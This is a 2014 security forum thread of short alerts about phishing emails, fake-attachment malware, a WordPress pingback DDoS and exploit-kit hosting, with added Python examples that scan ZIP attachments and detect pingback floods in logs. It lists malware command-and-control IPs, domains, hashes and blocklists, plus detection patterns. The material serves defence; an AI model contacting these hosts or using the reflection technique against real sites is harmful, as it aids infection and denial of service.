Mar 4, 2014 - "Bitcoin bank Flexcoin said on Tuesday it was closing down after it lost bitcoins worth about $600,000 to a hacker attack. Flexcoin said in a message posted on its website that all 896 bitcoins stored online were stolen on Sunday. "As Flexcoin does not have the resources, assets, or otherwise to come back from this loss, we are closing our doors immediately," the company said. [ http://www.flexcoin.com/ ] Alberta, Canada-based Flexcoin, which is working with law enforcement agencies to trace the source of the hack, said it would return bitcoins stored offline, or in "cold storage", to users. Cold storage coins are held in computers not connected to the Internet and therefore cannot be hacked... Bitcoin is a digital currency that, unlike conventional money, is bought and sold on a peer-to-peer network independent of central control. Its value soared last year, and the total worth of bitcoins minted is now about $7 billion..."

:fear: :sad:

AplusWebMaster
2014-03-05, 13:59
FYI...

Fake PayPal 'Cancel Payment' Phishing Scam
- http://www.hoax-slayer.com/paypal-cancel-payment-phishing-scam.shtml
Mar 5, 2014 - "Email purporting to be from PayPal claims that the recipient has sent a payment to a specified merchant and offers instructions for cancelling the payment if required... The email is a phishing scam designed to trick recipients into divulging their PayPal account login details and a large amount of personal and financial information. All of the information supplied will be sent to online criminals and used to commit financial fraud and identity theft. The merchant or seller specified in the messages may vary in different incarnations of the scam. If you receive one of these bogus emails, do not click on any links or open any attachments that it contains...
> http://www.hoax-slayer.com/images/paypal-cancel-payment-phishing-2014-1.jpg
.
> http://www.hoax-slayer.com/images/paypal-cancel-payment-phishing-2014-2.jpg
... Those who do click will be taken to a -bogus- website and asked to supply their PayPal email address and password on a fake login box. After logging in, they will be presented with the following web form, which asks for a large amount of personal and financial information:
> http://www.hoax-slayer.com/images/paypal-cancel-payment-phishing-2014-3.jpg
... All of the information supplied can be harvested by criminals and used to hijack the compromised PayPal accounts, commit credit card fraud and steal the identities of victims... If a PayPal phishing scam email hits your inbox, you can submit it to the company for analysis via the email address listed on the company's phishing information page*. A quick rule of thumb. PayPal emails will ALWAYS address you by your first and last names or business name. They will never use generic greetings such as 'Dear customer'. Nor will they omit the greeting..."
* https://www.paypal.com/us/webapps/helpcenter/helphub/article/?articleID=FAQ2331&m=SRE

:mad: :fear:

AplusWebMaster
2014-03-06, 23:54
FYI...

Deceptive ads expose users to PUA ...
- http://www.webroot.com/blog/2014/03/06/deceptive-ads-expose-users-pua-installbrainpc-performer-pua-potentially-unwanted-application/
Mar 6, 2014 - "Deceptive ads continue to represent the primary distribution vector for the vast majority of Potentially Unwanted Applications (PUAs) that we track. Primarily relying on ‘visual social engineering’ tactics, gullible end users fall victim to these privacy-violating applications, largely due to the fact that they instantaneously agree to the terms in the End User’s Agreement presented to them. We’ve recently spotted yet another variant of the InstallBrain family of Potentially Unwanted Applications (PUA’s), tricking users into installing a bogus PC performance boosting application... actionable intelligence on the domains/IPs and related privacy-violating MD5s known to have shared the same infrastructure as the initial PUA profiled in this post...
Sample screenshot of the landing page:
> https://www.webroot.com/blog/wp-content/uploads/2014/03/Potentially_Unwanted_Software_PUA_InstallBrain_PC_Performer.png
... Sample detection rate for PurpleTech Software Inc’s PC Performer:
MD5: f85a9d94027c2d44f33c153b22a86473* ... Once executed, the sample phones back to:
hxxp:// inststats-1582571262.us-east-1.elb.amazonaws .com – 23.21.180.138
hxxp:// api.ibario .com – 50.22.175.81
hxxp:// 107.20.142.228 /service/stats.php?sv=1
hxxp:// 174.36.241.169 /events
Domain name reconnaissance:
api.ibario .com – 50.22.175.81; 96.45.82.133; 96.45.82.197; 96.45.82.69; 96.45.82.5
thepcperformer .com – 96.45.82.5; 96.45.82.69; 96.45.82.133; 96.45.82.197 ...
... responded to the same C&C server (23.21.180.138) ...
... phoned back to the same IP (50.22.175.81)..."
* https://www.virustotal.com/en/file/124348611e216d1ccf01a06261ceb2a5b8fbee0c305e54d274a133fd35c22619/analysis/1394030288/

:mad: :fear:

AplusWebMaster
2014-03-07, 22:46
FYI...

Fake TurboTax: E-file successful email
- http://security.intuit.com/alert.php?a=101
3/7/14 - " People are receiving fake emails with the title "TurboTax: E-file Successful." Below is a copy of the email people are receiving:
> http://security.intuit.com/images/ttsuccessful.jpg
___
This is the end of the -fake- email.
Steps to Take Now
Do not open any attachment or click any links in the email...
Delete the email."
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Bank Transaction Statement Email Messages - 2014 Mar 07
Email Messages with Malicious Attachments - 2014 Mar 07
Fake Product Invoice Notification Email Messages - 2014 Mar 07
Fake Account Payment Information Email Messages - 2014 Mar 07
Fake Product Order Notification Email Messages - 2014 Mar 07
Fake Failed Delivery Notification Email Messages - 2014 Mar 07
Fake Fax Message Delivery Email Messages - 2014 Mar 07
Fake Fax Delivery Email Messages - 2014 Mar 07
Fake Payment Transaction Notification Email Messages - 2014 Mar 06...
(Links / more info at the cisco URL above.)
___

Friday (Spam) Roundup
- http://blog.malwarebytes.org/online-security/2014/03/a-friday-spam-roundup/
Mar 7, 2014 - "... spam for the weekend?
1) Bitcoin spam: http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/03/bitspam1.jpg
“Buy and sell Bitcoins!
Find the best places online to buy / sell Bitcoin currency”
The link just takes clickers to what appears to be a parked domain with sponsored links. In other words, delete / avoid.
2) Skype Team Direct Messages: http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/03/bitspam2.jpg
“Direct message from Skype Team
Skype
Direct Message
View Message
Respectfully,
Skype Service”
3) Pharmacy msgs: http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/03/bitspam3.jpg
4) TV spamblog spam [-not- email based]: ... when scammers try to take advantage of a service like Google Docs they’re going phishing. I saw this and thought it was at least a little unusual – Google Docs being used to spam a cookie-cutter spamblog promising free TV shows. I’m sure you’ve seen those spam posts across the net...
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/03/bitspam5.jpg "

:mad: :fear:

AplusWebMaster
2014-03-10, 11:40
FYI...

Q4-2013 McAfee Threat Report
- https://net-security.org/malware_news.php?id=2727
Mar 10, 2014 - "... By the end of 2013, McAfee Labs saw the number of malicious signed binaries in our database -triple- to more than 8 million suspicious binaries. In the fourth quarter alone, McAfee Labs found more than 2.3 million new malicious signed applications, a 52 percent increase from the previous quarter. The practice of code signing software validates the identity of the developer who produced the code and ensures the code has not been tampered with since the issue of its digital certificate...
> http://www.net-security.org/images/articles/mcafee032014.jpg
... Additional findings:
- Mobile malware. McAfee Labs collected 2.47 million new mobile samples in 2013, with 744,000 in the fourth quarter alone. Our mobile malware zoo of unique samples grew by an astounding 197 percent from the end of 2012.
- Ransomware. The volume of new ransomware samples rose by 1 million new samples for the year, doubling in number from Q4 2012 to Q4 2013.
- Suspicious URLs. McAfee Labs recorded a 70 percent increase in the number of suspect URLs in 2013.
- Malware proliferation. In 2013, McAfee Labs found 200 new malware samples every minute, or more than three new threats every second.
- Master boot record-related. McAfee Labs found 2.2 million new MBR-attacks in 2013.
The complete report is available here*."
* http://www.mcafee.com/us/resources/reports/rp-quarterly-threat-q4-2013.pdf
___

Facebook scam: naked videos of friends - delivers Trojans instead
- https://net-security.org/malware_news.php?id=2728
Mar 10, 2014 - "Bitdefender has discovered that more than 1,000 people have already been tricked into installing Trojan malware after clicking on a new Facebook scam that promises naked videos of their friends. The UK was the second most affected country by number of users and infections were also detected in France, Germany, Italy and Romania.
> http://www.net-security.org/images/articles/bitdefender032014.jpg
The scam, now spreading on the social network, can multiply itself by tagging users’ friends extremely quickly. To avoid detection, cybercriminals vary the scam messages by incorporating the names of Facebook friends alongside “private video,” “naked video” or “XXX private video”... To increase the infection rate, the malware has multiple installation possibilities. Besides the automated and quick drop on the computer or mobile device, it also multiplies itself when users -click- the -fake- Adobe Flash Player update. To make the scam more credible, cybercriminals faked the number of views of the adult video to show that over 2 million users have allegedly clicked on the infected YouTube link..."
___

Malware peddler tryouts: different exploit kits
- https://net-security.org/malware_news.php?id=2729
Mar 10, 2014 - "Websense researchers* have been following several recent -email-spam- campaigns targeting users of popular services such as Skype and Evernote, and believe them to be initiated by the infamous ru:8080 gang, which has a history of similar spam runs impersonating legitimate Internet services such as Pinterest, Dropbox, etc. These latest campaigns start with -spoofed- emails purportedly alerting the recipients to a message/image they have received on Skype and Evernote, offering an embedded link that leads to compromised sites hosting an exploit kit. In the past, the aforementioned gang's preferred exploit kit was Blackhole, but with the arrest and prosecution of its creator... they have switched first to using the Magnitude, then the Angler and, finally, the Goon exploit kit. This group is currently focusing more on UK users, but targets US and German users as well... This gang typically pushes information-stealing trojans such as Cridex, Zeus GameOver, and click-fraud trojans like ZeroAccess onto the users, but they have also been known to deliver ransomware and worms. In these last few cases, the delivered malware is a Zeus variant that was initially detected by just a handful of commercial AV solutions..."
* http://community.websense.com/blogs/securitylabs/archive/2014/02/19/cyber-criminals-ramp-up-use-of-angler-and-goon-exploit-kits.aspx
___

Fake gateway .gov .uk SPAM
- http://blog.dynamoo.com/2014/03/gatewayconfirmationgatewaygovuk-spam.html
10 Mar 2014 - "This -fake- spam from the UK Government Gateway comes with a malicious payload:
Date: Mon, 10 Mar 2014 12:04:21 +0100 [07:04:21 EDT]
From: gateway.confirmation@ gateway .gov .uk
Subject: Your Online Submission for Reference 485/GB3283519 Could not process
Priority: High
The submission for reference 485/GB3283519 was successfully received and was not
processed.
Check attached copy for more information.
This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.

Attached is a file GB3283519.zip which in turn contains a malicious executable GB10032014.pdf.scr which has an icon that makes it look like a PDF file. This has a VirusTotal detection rate of 7/50*. Automated analysis tools... show attempted downloads from i-softinc .com on 192.206.6.82 (MegaVelocity, Canada) and icamschat .com on 69.64.39.215 (Hosting Solutions International, US). I would recommend that you -block- traffic to the following IPs and domains:
192.206.6.82
i-softinc .com
icamschat .com "
* https://www.virustotal.com/en-gb/file/f7773b7d9fcc3f98b2680d145c6b9e6e4b5c4832a1d6e9f5da96b3692865eb97/analysis/1394462821/
___

MS Account 'Outlook Web Access' Phish ...
- http://www.hoax-slayer.com/outlook-web-access-phishing-scam.shtml
Mar 10, 2014 - "Email purporting to be from the Microsoft Account Team claims that recipients must click a link to upgrade their email account and set up Outlook Web Access. The email is -not- from Microsoft and the claim that users must click a link to upgrade their email accounts is a lie. The message is a phishing scam designed to trick users into sending their Microsoft account login details to criminals.
Example:
> http://www.hoax-slayer.com/images/microsoft-account-phishing-scam-2014-1.jpg
... the email is -not- from Microsoft and the claim that users must follow a link to upgrade their email account is untrue. Instead, the email is a criminal ruse designed to trick people into giving their Microsoft account details to cybercriminals. Those who fall for the trick and click one of the links as instructed will be taken to a -bogus- 'Microsoft' website that displays the following login form:
> http://www.hoax-slayer.com/images/microsoft-account-phishing-scam-2014-2.jpg
Once they have added their email address and password, victims will then be presented with a message claiming that their 'Outlook account was updated successfully'. Within a few seconds, they will be redirected to a genuine Microsoft website. Meanwhile, the criminals responsible for the phishing campaign can use the stolen credentials to hijack the real Microsoft accounts belonging to their victims. A 'Microsoft account' is the new name for what was previously known as a 'Windows Live ID.' The one set of login details can be used to access a number of Microsoft services, and are thus a valuable target for scammers..."

:mad: :fear:
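
The attachment trick in the Government Gateway spam above (GB10032014.pdf.scr carrying a PDF icon) and in the Asprox eviction mail (an .exe shown with a Word icon) is the same one: a document-looking name or icon wrapped around a Windows executable inside a ZIP. The check below is an added example written for this thread, not code from dynamoo, stopmalvertising or any of the quoted blogs. It opens a ZIP, classifies each member by its extension chain and by whether the content starts with the MZ header a PE/DOS executable carries, so a renamed binary is caught even when the name looks clean. The ZIP it scans is constructed in memory; the extension sets are a practical subset chosen for this example, not an authoritative list.

```python
"""Flag ZIP members that fake a document type with a second, executable
extension (e.g. GB10032014.pdf.scr) or that are PE executables under a
document name. Added example; the sample archive is built in memory and
is not the real spam attachment."""
import io
import zipfile

# Extensions Windows will run on double-click (assumption: a practical
# subset used for this example, not an exhaustive list).
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "js", "jse",
                   "vbs", "vbe", "wsf", "wsh", "msi", "hta", "cpl", "lnk"}
# Document/image types that a spoofed icon or double extension imitates.
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png",
              "gif", "txt", "rtf"}
MZ_MAGIC = b"MZ"  # first two bytes of every DOS/PE executable


def classify_member(name: str, head: bytes) -> str:
    """Return one of: 'double-extension', 'executable', 'pe-masquerade', 'ok'.

    name: the member's path inside the archive; head: its first bytes.
    """
    base = name.rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    inner = parts[-2] if len(parts) > 2 else ""
    if ext in EXECUTABLE_EXTS and inner in DECOY_EXTS:
        return "double-extension"      # invoice.pdf.exe style lure
    if ext in EXECUTABLE_EXTS:
        return "executable"            # honest extension, still an executable
    if head.startswith(MZ_MAGIC):
        return "pe-masquerade"         # content is PE whatever the name says
    return "ok"


def scan_zip(data: bytes) -> dict:
    """Map each file member in the ZIP bytes to its classification."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(len(MZ_MAGIC))
            findings[info.filename] = classify_member(info.filename, head)
    return findings


def build_sample_zip() -> bytes:
    """Constructed test archive: fake PE bodies, not real malware."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("GB10032014.pdf.scr", b"MZ\x90\x00" + b"\x00" * 60)
        zf.writestr("Urgent_notice_of_eviction.exe", b"MZ" + b"\x00" * 60)
        zf.writestr("invoice.pdf", b"MZ" + b"\x00" * 60)   # PE renamed to .pdf
        zf.writestr("readme.txt", b"plain text, nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    for member, verdict in scan_zip(build_sample_zip()).items():
        print(f"{verdict:17s} {member}")
```

Run on a real mail attachment, anything other than `ok` is grounds to quarantine the message; the `pe-masquerade` case is the one Explorer's "show known file extensions" setting does not help with, because the name is not lying, only the icon and the bytes are.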

AplusWebMaster
2014-03-12, 13:44
FYI...

DDoS attack - WordPress pingback abuse...
- http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-attack.html
Mar 10, 2014 - "Distributed Denial of Service (DDOS) attacks are becoming a common trend on our blog lately, and that’s OK because it’s a very serious issue for every website owner... Any WordPress site with Pingback enabled (which is on by default) can be used in DDOS attacks against other sites. This is a well known issue within WordPress and the core team is aware of it, it’s not something that will be patched though. In many cases this same issue is categorized as a feature, one that many plugins use..."
* http://it-beta.slashdot.org/story/14/03/11/2324207/large-ddos-attack-brings-wordpress-pingback-abuse-back-into-spotlight
Mar 12, 2014

- http://arstechnica.com/security/2014/03/more-than-162000-legit-wordpress-sites-abused-in-powerful-ddos-attack/
Mar 11 2014
___

Malware found in Google Play Store
- http://blog.malwarebytes.org/mobile-2/2014/03/malware-found-in-google-play-store/
Mar 12, 2014 - "Most experts agree the best way to stay safe from Android malware is to stick to trusted sources–specifically the Play Store. Unfortunately, those sources can sometimes be compromised. In the last week there have been -two- malware families found in Google’s Play Store... The first one, found by Lookout Security*, is a remote administration tool called Dendroid.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/03/dendriod02.jpg
This particular malware is a variant of the publicly available remote tool AndroRAT. Dendroid was advertised as “Parental Control” in the Play Store... This Play Store version of Dendroid was discovered only a couple of days after Dendroid was uncovered from the underworld by Symantec**, which means Google was -unaware- of the malicious code at the time... The second app was uncovered by Avast*** and is an SMS -Trojan- disguised as a night vision app.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/03/fakecam01.jpg
The Trojan is capable of looking up contact numbers in social messaging apps like WhatsApp, Telegram, and ChatON. Once the number is collected it’s sent to a remote server and the numbers are used to register for a premium service costing up to $50... Both of these apps have been removed from the Play Store... Android malware continues to increase and at times they’re able to sneak into places we trust..."
* https://blog.lookout.com/blog/2014/03/06/dendroid/

** http://www.symantec.com/connect/blogs/android-rats-branch-out-dendroid

*** http://blog.avast.com/2014/03/07/google-play-whats-the-newest-threat-on-the-official-android-market/
___

Twitter crashes... again
- http://www.reuters.com/article/2014/03/11/us-twitter-outage-idUSBREA2A1NY20140311
Mar 11, 2014 - "Twitter Inc crashed on Tuesday for the second time in nine days when a software glitch stalled the popular messaging service for about one hour. The company apologized to its 250 million users in a status blog, saying it had encountered "unexpected complications" during "a planned deploy in one of our core services." The outage began around 11 a.m. Pacific time and service had "fully recovered" by 11:47 a.m., the San Francisco-based company said..."
___

Beware Bitcoin: U.S. brokerage regulator
- http://www.reuters.com/article/2014/03/11/us-bitcoin-finra-idUSBREA2A1OJ20140311
Mar 11, 2014 - "Bitcoin can expose people to significant losses, fraud and theft, and the lure of a potential quick profit should not blind investors to the virtual currency's significant risks, a brokerage industry watchdog warned on Tuesday. In an investor alert* titled "Bitcoin: More than a Bit Risky,"* the Financial Industry Regulatory Authority (FINRA) said recent events such as the bankruptcy of Bitcoin exchange operator Mt. Gox have spotlighted some of the currency's risks..."
* http://www.finra.org/Newsroom/NewsReleases/2014/P457519

:fear: :sad:
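
On the WordPress pingback DDoS above: from the target's side the flood shows up as ordinary GET requests arriving from hundreds of unrelated hosts whose User-Agent is the string WordPress sends when it fetches a pingback source, `WordPress/<version>; http://<reflecting-site>`. The detector below is an added example for this thread, not code from Sucuri, Ars or the WordPress project. It parses combined-format access log lines, keys on that User-Agent, and raises an alert when one time window contains pingback fetches from more distinct WordPress sites than a legitimate blog would ever see; it also reports which sites were used as reflectors so their owners can be told. The log lines are constructed; the random numeric query string (`/?4137049=643182`) is treated as an extra indicator because it was reported for this campaign as a cache-busting trick, which is an assumption about the attacker's tooling, not a property of WordPress.

```python
"""Detect a WordPress pingback reflection flood in web server access logs.
Added example with constructed log lines; not from the quoted articles."""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# User-Agent WordPress uses when it fetches the pingback source URL.
UA_RE = re.compile(r"^WordPress/(?P<ver>[\d.]+); (?P<site>https?://\S+)")
# Random "?digits=digits" query string reported for this campaign (assumption).
CACHEBUST_RE = re.compile(r"\?\d+=\d+(?:\s|$)")
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: six reflectors hit within one minute, one normal
# browser request, and one lone WordPress fetch five minutes later.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Mar/2014:13:00:01 +0000] "GET /?4137049=643182 HTTP/1.0" 200 11208 "-" "WordPress/3.8.1; http://blog-a.example"
203.0.113.11 - - [10/Mar/2014:13:00:02 +0000] "GET /?9922131=112234 HTTP/1.0" 200 11208 "-" "WordPress/3.7; http://blog-b.example"
198.51.100.5 - - [10/Mar/2014:13:00:02 +0000] "GET /?1234567=765432 HTTP/1.0" 200 11208 "-" "WordPress/3.8; http://blog-c.example"
198.51.100.6 - - [10/Mar/2014:13:00:03 +0000] "GET /?7777777=888888 HTTP/1.0" 200 11208 "-" "WordPress/3.8.1; http://blog-d.example"
192.0.2.44 - - [10/Mar/2014:13:00:04 +0000] "GET /?31337=1337 HTTP/1.0" 200 11208 "-" "WordPress/3.8.1; http://blog-e.example"
192.0.2.45 - - [10/Mar/2014:13:00:05 +0000] "GET /?5550001=2223334 HTTP/1.0" 200 11208 "-" "WordPress/3.6; http://blog-f.example"
192.0.2.99 - - [10/Mar/2014:13:00:05 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/27.0"
203.0.113.77 - - [10/Mar/2014:13:05:30 +0000] "GET /2014/03/post/ HTTP/1.0" 200 9000 "-" "WordPress/3.8.1; http://blog-g.example"
"""


def parse_line(line: str):
    """Return a dict for a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    ua = UA_RE.match(ev["ua"])
    ev["wp_site"] = ua.group("site") if ua else None
    ev["cachebust"] = bool(CACHEBUST_RE.search(ev["req"]))
    return ev


def detect_pingback_flood(lines, window=timedelta(seconds=60), min_sites=5):
    """Return one alert dict per time window with >= min_sites distinct reflectors."""
    buckets = defaultdict(list)
    for ev in (parse_line(l) for l in lines):
        if ev and ev["wp_site"]:
            key = int(ev["ts"].timestamp() // window.total_seconds())
            buckets[key].append(ev)
    alerts = []
    for key in sorted(buckets):
        evs = buckets[key]
        sites = {e["wp_site"] for e in evs}
        if len(sites) >= min_sites:
            alerts.append({
                "window_start": datetime.fromtimestamp(key * window.total_seconds(), evs[0]["ts"].tzinfo),
                "hits": len(evs),
                "distinct_sites": len(sites),
                "distinct_ips": len({e["ip"] for e in evs}),
                "cachebust_ratio": sum(e["cachebust"] for e in evs) / len(evs),
            })
    return alerts


def reflector_sites(lines) -> Counter:
    """Count pingback fetches per reflecting WordPress site (for notification)."""
    return Counter(ev["wp_site"] for ev in map(parse_line, lines) if ev and ev["wp_site"])


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for a in detect_pingback_flood(lines):
        print(a)
    print(reflector_sites(lines).most_common(3))
```

The `min_sites` threshold is the tunable part: a real pingback to a popular post arrives from one or two sites, a reflection attack from hundreds within seconds, so even a low value separates the two. A `cachebust_ratio` near 1.0 confirms every fetch was deliberately uncacheable, which is what made this attack expensive for the target.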

AplusWebMaster
2014-03-13, 12:42
FYI...

Exploit Kits - OVH Canada / r5x .org / Penziatki
- http://blog.dynamoo.com/2014/03/evil-network-ovh-canada-r5xorg-penziatki.html
13 Mar 2014 - "Hat tip to Frank Denis (@jedisct1)* for this report** on Nuclear EK's hosted by OVH Canada using their infamous "Penziatki" customer which is linked to black-hat host r5x .org***. The blocks have been identified as belonging to that customer and I would recommend that you block them:
198.27.114.16/30
198.27.114.64/27
198.50.186.232/30
198.50.186.236/30
198.50.186.252/30
198.50.231.204/30
OVH Canada have repeatedly hosted exploit kits for this customer... If you are in a security-sensitive environment then you might simply want to block traffic to the following ranges:
198.27.0.0/16
198.50.0.0/16
Of course this will block many legitimate sites, but if stopping exploit kits is a priority over some user inconvenience then you may want to consider it. If you want a slightly more nuanced blocklist then these ranges contain the biggest concentration of malware:
198.27.114.0/24
198.50.172.0/24
198.50.186.0/24
198.50.197.0/24
198.50.231.0/24 ..."
(More detail at the dynamoo URL above.)

* https://twitter.com/jedisct1

** https://gist.github.com/jedisct1/9509527 - Nuclear Exploit Kit Mar 12

*** http://blog.dynamoo.com/search/label/R5X.org

> http://google.com/safebrowsing/diagnostic?site=AS:16276
___

Malware sites to block 13/3/14
- http://blog.dynamoo.com/2014/03/malware-sites-to-block-13313.html
13 Mar 2014 - "These IPs and domains seem to be involved in injection attacks today. I recommend you block them.
64.120.242.178
188.226.132.70
93.189.46.90 ...
The domains being abused are as follows.. many of them appear to be hijacked legitimate domains..."
(Many others listed at the dynamoo URL above.)
___

Fake Blood count result - fake PDF malware
- http://myonlinesecurity.co.uk/important-complete-blood-count-result-fake-pdf-malware/
13 Mar 2014 - "This email saying IMPORTANT Complete blood count result pretending to come from NICE (National Institute for Health and Care Excellence) has to be the most vicious and evil attempt by any malware purveyor to try to infect a victim. Sending an email saying that you probably have cancer will alarm & distress so many people and is just the most offensive and disgusting attempt to trick a user into opening a malware attachment... another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Other subjects in this evil email attempt to infect you are:
- IMPORTANT:Blood analysis result
- IMPORTANT:Blood analysis
- IMPORTANT:Complete blood count (CBC)result ...
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/IMPORTANT-Complete-blood-count-CBCresult.png
... 13 March 2014: CBC_Result_9B4824B65E.zip (55kb) Extracts to CBC_scaned_584444449.pdf.exe
Current Virus total detections: 2/50*... careful when unzipping them and make sure you have “show known file extensions enabled”**, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
* https://www.virustotal.com/en/file/d666d6e927caa1b5b8fcef5891d8ec8afc7c9984e02307e4ee7c3ee411c73218/analysis/1394703905/

** http://myonlinesecurity.co.uk/why-you-should-set-your-folder-options-to-show-known-file-types/
___

Key Secured Message -fake- PDF malware
- http://myonlinesecurity.co.uk/key-secured-message-fake-pdf-malware/
13 March 2014 - "Key Secured Message pretending to come from Payroll Reports <payroll @quickbooks .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details...
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/Key-Secured-Message.png
... Extracts to NIKON-2013564-JPEG.scr ... Current Virus total detections: 2/50*
This Key Secured Message is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en-gb/file/0bfe5d4d5f2079666292f3aa7e7f2d4a7eaf76b0a1fdb7cb4c2e881c606855c2/analysis/
___

Fake Sky .com "Statement of account" SPAM
- http://blog.dynamoo.com/2014/03/skycom-statement-of-account-spam.html
13 Mar 2014 - "This -fake- Sky .com email comes with a malicious attachment:
Date: Thu, 13 Mar 2014 12:23:09 +0100 [07:23:09 EDT]
From: "Sky .com" [statement@ sky .com]
Subject: Statement of account
Afternoon,
Please find attached the statement of account.
We look forward to receiving payment for the December invoice as this is now due for
payment.
Regards, Carmela ...
Wilson McKendrick LLP Solicitors ...

Attached is an archive Statement.zip which in turn contains a malicious executable Statement.scr which has a VirusTotal detection rate of 6/50*. Automated analysis tools... show attempted connections to the following domains and IPs:
188.247.130.190 (Prime Telecom SRL, Romania)
gobemall .com
gobehost .info
184.154.11.228 (Singlehop, US)
terenceteo .com
184.154.11.233 (Singlehop, US)
quarkspark .org
The two Singlehop IPs appear to belong to Host The Name (hostthename .com) which perhaps indicates a problem at that reseller.
Recommended blocklist:
184.154.11.228
184.154.11.233
188.247.130.190
gobemall .com
gobehost .info
terenceteo .com
quarkspark .org "
* https://www.virustotal.com/en-gb/file/809154e0402366e7dfb272ea1620cc4a7b1d03ea0c6880835d394d117608fda9/analysis/1394715270/
___

HM Revenue & Customs Spam
- http://threattrack.tumblr.com/post/79368114782/hm-revenue-customs-spam
Mar 12, 2014 - "Subjects Seen:
HMRC Tax Notice
Typical e-mail details:
Dear <email address>
Please be advised that one or more Tax Notices (P6, P6B) have been issued.
For the latest information on your Tax Notices (P6, P6B) please open attached report.
Document Reference: 6807706.

Malicious File Name and MD5:
PDF_Scanned_HMRCBBD45F6647.zip (09BA8CF32FDDE3F73EA8F2E6F75BDF1E)
scaned_7246582_pdf_4364534533.exe (3F347C85BEA303904975FF0A8DE49E7E)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/71620291d779248364387873deffee64/tumblr_inline_n2c0ewlGe41r6pupn.png

Tagged: HMRC, weelsof

:mad: :fear:
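The CBC and "Key Secured Message" items above both turn on the same trick: a zip attachment whose member is really an .exe or .scr dressed up with a document-style name (CBC_scaned_584444449.pdf.exe, NIKON-2013564-JPEG.scr), which only "show known file extensions" exposes. The following is an added example, not code from this thread or from the blogs it quotes; it screens archive member names on the mail gateway or a triage box for exactly that pattern. The member names come from the posts above; the archive contents are harmless placeholder bytes constructed for the example, and the extension sets are my own assumptions.

```python
import io
import zipfile

# Extensions Windows will run directly even when the icon is spoofed to look like a document
# (assumed set for this example; extend it to your own policy).
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
# Extensions a lure typically pretends the file to be (assumed set).
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".jpg", ".jpeg", ".mov"}


def classify_name(name):
    """Classify one archive member name.

    Returns 'double-extension' for a document-looking extension followed by an
    executable one (x.pdf.exe, x.MOV.exe), 'executable' for a bare executable
    extension (x.scr), or 'ok' otherwise.  Only the basename is examined.
    """
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    if len(parts) < 2:
        return "ok"
    if "." + parts[-1] not in EXECUTABLE_EXTENSIONS:
        return "ok"
    if len(parts) >= 3 and "." + parts[-2] in DOCUMENT_EXTENSIONS:
        return "double-extension"
    return "executable"


def scan_zip_bytes(data):
    """Scan a zip archive held in memory without extracting anything to disk.

    Returns a list of (member name, verdict) for every non-directory member
    whose name is not 'ok'.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            verdict = classify_name(info.filename)
            if verdict != "ok":
                findings.append((info.filename, verdict))
    return findings


def build_sample_zip(member_names):
    """Constructed test archive: every member holds placeholder bytes, not malware."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in member_names:
            zf.writestr(name, b"placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    # Member names taken from the posts above; the archive itself is constructed here.
    sample = build_sample_zip([
        "CBC_scaned_584444449.pdf.exe",
        "NIKON-2013564-JPEG.scr",
        "notes.txt",
    ])
    for member, verdict in scan_zip_bytes(sample):
        print(f"{verdict:17} {member}")
```

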